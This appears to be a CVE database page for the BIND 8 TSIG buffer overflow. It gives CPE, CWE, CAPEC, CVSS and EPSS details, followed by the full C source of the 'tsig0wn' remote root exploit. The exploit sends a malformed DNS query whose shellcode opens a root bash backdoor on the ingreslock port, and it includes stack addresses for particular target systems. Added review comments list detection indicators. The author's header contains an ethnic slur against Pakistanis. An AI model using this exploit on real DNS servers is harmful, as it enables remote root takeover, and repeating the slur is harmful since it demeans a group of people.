CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
CVE Information
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
11%
–
–
2022-04-03
–
–
11%
–
–
2022-05-22
–
–
11%
–
–
2023-03-12
–
–
–
2.83%
–
2023-10-15
–
–
–
2.83%
–
2024-02-11
–
–
–
18.93%
–
2024-06-02
–
–
–
18.93%
–
2024-12-22
–
–
–
7.65%
–
2025-01-19
–
–
–
7.65%
–
2025-03-18
–
–
–
–
54.97%
2025-03-30
–
–
–
–
57.87%
2025-04-22
–
–
–
–
45.43%
2025-04-22
–
–
–
–
45.43%
EPSS Percentile
The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile is therefore a way to compare one CVE's EPSS score with those of all other CVEs.
/*
* tsig0wn.c
* Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
* gneisenau@berlin.com
* The author is not and will not be held responsible for the action of
* other people using this code.
* provided for informational purposes only
* since a greetz section is de rigeur
* greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
* a special fuck to all pakis including those idiots from GForce, etc....
* but then pakistan is one big village comprising exclusively of prize idiots
* tabstop set at 3
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
/*
* This shellcode sux. cant ever get around to coding another one.
*/
/*
 * NOTE(review): payload bytes that main() copies into the first question of
 * the query. Two parts are visible in the array:
 *   - a short x86 stub; the sequence 0xb0,0x0b,0xcd,0x80 is the Linux/i386
 *     execve system call (number 11 via int 0x80), and the later
 *     0xb0,0x01,...,0xcd,0x80 is an exit call;
 *   - ASCII argument strings separated by 0xff bytes: "/bin/sh", "-c" and a
 *     command that writes a one-line inetd configuration to /tmp/.inetd.conf
 *     (service "ingreslock", user root, program /bin/bash with -i) and then
 *     starts /usr/sbin/inetd with that file.
 * Host-side indicators that follow directly from those strings: the file
 * /tmp/.inetd.conf, an inetd process whose argument is that path, and a new
 * TCP listener on the ingreslock port (conventionally 1524/tcp in
 * /etc/services). The only 0x00 in the array is the final byte.
 */
char shellcode[] = {
0xeb,0x3b,0x5e,0x31,0xc0,0x31,0xdb,0xb0,0xa0,0x89,
0x34,0x06,0x8d,0x4e,0x07,0x88,0x19,0x41,0xb0,0xa4,
0x89,0x0c,0x06,0x8d,0x4e,0x0a,0x88,0x19,0x41,0xb0,
0xa8,0x89,0x0c,0x06,0x31,0xd2,0xb0,0xac,0x89,0x14,
0x06,0x89,0xf3,0x89,0xf1,0xb0,0xa0,0x01,0xc1,0xb0,
0x0b,0xcd,0x80,0x31,0xc0,0xb0,0x01,0x31,0xdb,0xcd,
0x80,0xe8,0xc0,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0xff,0x2d,0x63,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20,0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20,0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e,0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f,0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73,0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b,0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69,0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};
// DNS resource-record type code for TSIG (transaction signature); main() writes it
// as the type of the single additional record.
#define NS_T_TSIG 250
// Byte distances used by main(): SHELLCODE_OFFSET is added to buffer_start to get the
// address printed as "shellcode will reside at"; DUMMY_ARG_OFFSET is both added to
// buffer_start (the "dummy argument" address) and used as an offset into the query buffer.
#define SHELLCODE_OFFSET 13
#define DUMMY_ARG_OFFSET 176
// Value main() stores, little-endian, at query + DUMMY_ARG_OFFSET; the author ties it to
// the evEvent_p type field in BIND's eventlib.
#define ENUM_FILE 1 //eventlib_p.h line 141
/*
 * Table of per-target constants selected with -s (1-based on the command line).
 * The list is terminated by the entry whose system_name is NULL.
 *
 * NOTE(review): every entry is a fixed 0xbfff.... stack address plus a fixed
 * filler length, so the tool as written assumes the target named process has a
 * predictable and executable stack. Address-space layout randomisation and a
 * non-executable stack remove that assumption; updating named to a release
 * without the TSIG overflow removes the flaw itself.
 */
struct {
char *system_name;
unsigned int buffer_start; /* the address where out buffer starts in memory */
unsigned int frame_pointer; /* content of the frame pointer */
int garbage_len; /* length of the garbage in which we will embed ebp|eip */
} system[] = {
{ "Test value 1", 0xbffff640, 0xbffff868, 326, },
{ "Test value 2", 0xbffff5f0, 0xbffff700, 326, },
{ "Slackware 7.0", 0xbffff590, 0xbffff7e8, 326, },
{ NULL, 0x0, 0x0, },
};
// Forward declarations for the two helpers defined after main().
void usage (void);
void encode_dns_name (char *, int, int);
/*
 * Builds one malformed DNS query in a PACKETSZ-byte stack buffer and sends it
 * as a single UDP datagram to port 53 of the host named on the command line,
 * then exits without reading any reply.
 *
 * Options: -b and -f take hexadecimal values for buffer_start and
 * frame_pointer; -s takes a 1-based index into the system[] table.
 *
 * NOTE(review): what the datagram looks like on the wire, for anyone writing
 * or validating a detection for this proof of concept (all taken from the
 * statements below):
 *   - header: ID 0x1234, QR 0, opcode 0, QDCOUNT 2, ARCOUNT 1;
 *   - question 1: the "name" is the raw shellcode array rather than
 *     length-prefixed labels, followed by type A / class IN;
 *   - question 2: a name built by encode_dns_name() from 'g' and 'o' filler
 *     over garbage_len octets (326 in every table entry, i.e. longer than the
 *     255-octet limit for a DNS name), with 16 bytes of little-endian
 *     addresses written into it, followed by type A / class IN;
 *   - additional section: owner name "\x01m\x00", type 250 (TSIG), class IN,
 *     after which the record simply stops; TTL and RDLENGTH are never written.
 * A DNS parser or IDS that enforces name length and record completeness
 * rejects the message on several of these points independently.
 */
int
main (int argc, char *argv[])
{
char query[PACKETSZ]; // construct our query packet here
char *query_ptr; // pointer to walk the query buffer
HEADER *hdr_ptr; // pointer to the header part of the query buffer
int arg;
unsigned int buffer_start,
frame_pointer, // value the frame pointer will have
shellcode_addr; // address our shellcode will have in the named buffer calculated from buffer_start
int index;
char *target_name;
struct hostent *target_host;
struct sockaddr_in target;
int sockfd;
if (argc < 2)
usage ();
// Option parsing: -b / -f read hex values, -s copies both values from the system[] table.
while ((arg = getopt (argc, argv, "b:f:s:")) != -1) {
switch (arg){
case 'b': sscanf (optarg, "%x", &buffer_start);
break;
case 'f': sscanf (optarg, "%x", &frame_pointer);
break;
case 's': index = atoi (optarg) - 1;
buffer_start = system[index].buffer_start;
frame_pointer = system[index].frame_pointer;
break;
default : usage ();
}
}
// The first non-option argument is the target host name.
if (!(target_name = argv[optind])){
fprintf (stderr, "tsig0wn: abysmal m0r0n error\n");
exit (1);
}
/*
* Form a header.
*/
memset (query, 0, PACKETSZ);
// cud blow up on other architectures not as liberal as x86. an union like in the bind sources is the correct way to go.
hdr_ptr = (HEADER *)query;
// Fixed transaction ID; a standard query (QR 0, opcode 0) claiming two questions and one additional record.
hdr_ptr->id = htons (0x1234);
hdr_ptr->qr = 0;
hdr_ptr->opcode = 0;
hdr_ptr->qdcount = htons (2);
hdr_ptr->arcount = htons (1);
/*
* Form a query after the header where we put in the shellcode
*/
// The array is copied byte-for-byte, including its terminating 0x00, into the position of the first question name.
query_ptr = (char *) (hdr_ptr + 1);
memcpy (query_ptr, shellcode, strlen (shellcode)+1);
query_ptr += strlen (shellcode) + 1;
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* we form another header here that contains garbage with embedded stuff
* i cud have put this in the same header as the shellcode and have the
* shellcode nullify. (shrug)
*/
{
char *tmp;
unsigned long dummy_argument = buffer_start+DUMMY_ARG_OFFSET;
frame_pointer &= 0xffffff00; // zero out the LSB like the overflow in ns_sign will do
// this will make layout a domain name for the second query, within which
// we will embed our ebp | eip
encode_dns_name (query_ptr, system[index].garbage_len, (frame_pointer - buffer_start) - (query_ptr - query));
query_ptr += system[index].garbage_len;
shellcode_addr = buffer_start + SHELLCODE_OFFSET;
// The computed addresses are printed to stdout before anything is sent.
printf ("buffer starts at address = 0x%x\n", buffer_start);
printf ("saved frame pointer after overwrite = 0x%x\n", frame_pointer);
printf ("shellcode will reside at address = 0x%x\n", shellcode_addr);
printf ("dummy argument will reside at address = 0x%x\n", dummy_argument);
// put in the type member of evEvent_p. File is what we need
// (ENUM_FILE stored as a 32-bit little-endian value at query + DUMMY_ARG_OFFSET)
tmp = query + DUMMY_ARG_OFFSET;
tmp[0] = ENUM_FILE;
tmp[1] = ENUM_FILE >> 8;
tmp[2] = ENUM_FILE >> 16;
tmp[3] = ENUM_FILE >> 24;
// embed the addresses. These will be interpreted as ebp and eip.
// we put the address where our shellcode will be situated twice.
// we overflow the saved frame pointer of datagram_read(). when the
// function returns to __evDispatch() it calls __evDrop().
// because we have shifted the frame pointer and thus __evDispatch()
// notion of the stack we also provide two pointers as arguments to
// __evDispatch. These pointers point to the start of this query header
// name, within which __evDrop will look for evEvent_p->type. we set
// type to be of type 'file' above which causes it to break and execute
// FREE() which in turn calls free().
// NOTE(review): the server-side call chain above is the author's description; none of
// those functions are visible in this file.
tmp = query + (frame_pointer - buffer_start); // advance the ptr to the place where we put in our ebp|eip
// Sixteen bytes follow: shellcode_addr twice, then dummy_argument twice, each little-endian.
tmp[0] = shellcode_addr;
tmp[1] = shellcode_addr >> 8;
tmp[2] = shellcode_addr >> 16;
tmp[3] = shellcode_addr >> 24;
tmp[4] = shellcode_addr;
tmp[5] = shellcode_addr >> 8;
tmp[6] = shellcode_addr >> 16;
tmp[7] = shellcode_addr >> 24;
tmp[8] = dummy_argument;
tmp[9] = dummy_argument >> 8;
tmp[10] = dummy_argument >> 16;
tmp[11] = dummy_argument >> 24;
tmp[12] = dummy_argument;
tmp[13] = dummy_argument >> 8;
tmp[14] = dummy_argument >> 16;
tmp[15] = dummy_argument >> 24;
}
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* Additional section containing T_SIG stuff
*/
// a name with only one char
memcpy (query_ptr, "\x01m\x00", 3);
query_ptr+=3;
PUTSHORT (NS_T_TSIG, query_ptr);
PUTSHORT (C_IN, query_ptr);
// these members wont be checked at all as find_key returns NULL on testing secretkey_info.
// PUTLONG (0, query_ptr);
// PUTSHORT (0, query_ptr);
// NOTE(review): with the two writes above commented out, the TSIG record ends after its
// class field; a truncated TSIG record naming a key the server does not hold is a usable
// signature on its own.
/*
* Connect and deliver the payload
*/
if (!(target_host = gethostbyname (target_name))){
fprintf (stderr, "host name resolution error for %s: %s\n", target_name, hstrerror (h_errno));
exit (1);
}
if ((sockfd = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0){
perror ("socket");
exit (1);
}
memset (&target, 0, sizeof (target));
target.sin_family = AF_INET;
target.sin_port = htons (53);
target.sin_addr.s_addr = ((struct in_addr *)target_host->h_addr_list[0])->s_addr;
if (connect (sockfd, &target, sizeof (target)) < 0){
perror ("connect");
exit (1);
}
// One datagram of query_ptr - query bytes; no reply is read.
if (send (sockfd, query, query_ptr - query, 0) < 0){
perror ("send");
exit (1);
}
exit (0);
}
/*
 * Print the banner, the numbered list of system[] entries and the two
 * invocation forms to stderr, then terminate the process with status 1.
 * The list is walked until the entry whose system_name is NULL.
 */
void
usage (void)
{
	int n = 0;

	fputs (" tsig0wn\n", stderr);
	fputs ("Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau\n", stderr);
	fputs ("\nAvailable System Types\n", stderr);

	/* Entries are shown 1-based, matching what the -s option expects. */
	while (system[n].system_name) {
		fprintf (stderr, "%d. %s\n", n + 1, system[n].system_name);
		n++;
	}

	fputs ("\nUsage:\n", stderr);
	fputs ("tsig0wn [ -s system type ] target\nor\n", stderr);
	fputs ("tsig0wn [ -b buffer start address ] [ -f frame pointer content ] target\n", stderr);
	exit (1);
}
/*
* a pretty convoluted function.
* len is the number of octets to fill in (including the length octet)
* embed_pos is the position where we need to embed this |len|ebp|eip|.
* Hopefully when we overwrite the saved ebp on the stack
* we expect it to point here and take the eip (which in turn points to our
* shellcode) from here. The challenge here is to lay out the octets so
* that it doesnt clash with embed_pos.
*
* What the code below does: writes DNS-style labels into buf, each one a
* length octet followed by that many filler bytes. Full labels are 63 bytes of
* 'g'; one shorter label of 'o' is emitted so that the next length octet falls
* at offset embed_pos, after which 'adjusted' is set and only 'g' labels
* follow. A zero octet is written at the final buf position. Nothing is
* returned; the function calls exit(1) if embed_pos (after adjustment) is not
* smaller than len.
*
* NOTE(review): every label stays within the 63-octet label limit, but main()
* passes a len of 326 from the system[] table, so the resulting name exceeds
* the 255-octet limit for a whole DNS name. A check on total name length, not
* only on individual labels, is what flags this name.
*/
void
encode_dns_name (char *buf, int len, int embed_pos)
{
int ctr = 0; // octets laid out so far
int adjusted = 0; // non-zero once the short 'o' label has been emitted
embed_pos -= 2; // our ebp | eip needs the length octet before it, so adjust for it now + 1
len--; // for the NULL octet at the end.
// sanity check
if (embed_pos >= len){
fprintf (stderr, "encode_dns_name: embed_pos >= len\n");
exit (1);
}
// The loop body is the single if/else statement that follows (no braces on the while).
while (ctr < len)
// max 63 octets allowed + preceding 1 octet for length
if (ctr+64 <= len){ // enough space for another 63+1
if (ctr+64 <= embed_pos || adjusted){ // embed_pos not in between
*buf++ = 63;
memset (buf, 'g', 63); buf += 63;
ctr+=64;
}
else { // need to adjust cuz embed_pos in between
// shorter label: ctr becomes embed_pos after this branch
*buf++ = embed_pos-ctr-1;
memset (buf, 'o', embed_pos-ctr-1); buf += embed_pos-ctr-1;
ctr+= embed_pos-ctr;
adjusted++;
}
}
else {
// fewer than 64 octets remain
if (len - ctr <= embed_pos || adjusted){ // only remaining len - ctr
*buf++ = len-ctr-1;
memset (buf, 'g', len-ctr-1);
ctr += 63; // we are quitting anyway after this. no need to update ctrs
}
else{
*buf++ = embed_pos-len-ctr-1;
memset (buf, 'o', embed_pos-len-ctr-1); buf += embed_pos-len-ctr-1;
ctr += embed_pos-len-ctr;
adjusted++;
}
}
*buf=0x00; // finish with a 0
}
// milw0rm.com [2001-03-01]